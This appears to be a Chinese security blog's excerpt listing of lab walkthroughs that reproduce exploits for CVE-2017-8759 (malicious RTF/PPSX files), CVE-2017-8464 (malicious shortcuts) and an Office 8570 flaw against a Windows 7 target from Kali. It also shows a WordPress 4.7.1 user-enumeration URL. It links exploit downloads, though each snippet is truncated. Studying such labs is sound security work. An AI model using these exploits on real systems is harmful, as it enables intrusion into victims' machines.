攻击机:192.168.0.109,kali 靶机:192.168.0.120 ,win7,office 2010 exp: CVE-2017-8759-masterPython version 2.7.13
一、生成恶意rtf或者ppsx文件
python cve-2017-8759_t[......]
攻击机:192.168.0.109,kali 靶机:192.168.0.120 ,win7,office 2010 exp: CVE-2017-8759-masterPython version 2.7.13
python cve-2017-8759_t[......]
给你一个快捷方式,你双击了,你就被可黑了。
关于漏洞的复现,github有py脚本:(本次实验不需要)
https://github.com/nixawk/labs/tree/master/CVE-2017-8464
攻击机:kali 192.168.0.111
攻击机:192.168.0.109,kali
靶机:192.168.0.120 ,win7,office 2010
exp: https://xycsec.cn/wp-content/uploads/2017/09/Office8570-master.zip
把exp拷贝进kali[……]
exp:http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
或者用php代码。需要修改$url
<?php header ('Content-type: text/html; charset=UTF-8');[......]